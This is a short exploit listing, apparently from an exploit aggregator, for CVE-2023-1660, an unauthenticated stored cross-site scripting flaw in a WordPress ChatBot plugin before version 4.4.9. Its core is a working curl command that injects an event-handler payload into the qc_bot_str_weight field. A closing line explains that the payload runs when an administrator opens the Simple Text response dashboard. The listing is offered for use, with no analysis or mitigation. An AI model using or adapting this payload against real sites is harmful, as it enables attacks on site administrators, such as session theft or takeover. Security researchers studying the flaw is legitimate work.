Exploit for ChatBot < 4.4.9 - Unauthenticated Stored XSS CVE-2023-1660

Name: Exploit for ChatBot < 4.4.9 - Unauthenticated Stored XSS CVE-2023-1660
Rating: 5 (35 reviews)

2023-04-12 | CVSS 5.8

## https://sploitus.com/exploit?id=WPEX-ID:1A5CBCFC-FA55-433A-A76B-3881B6C4BEA2
curl -X POST --data 'qc_bot_str_weight=" style=animation-name:rotation onanimationstart=alert(/XSS/)//' http://127.0.0.1/

The XSS will be trigged when an admin view the Simple Text response dashboard (/wp-admin/admin.php?page=simple-text-response)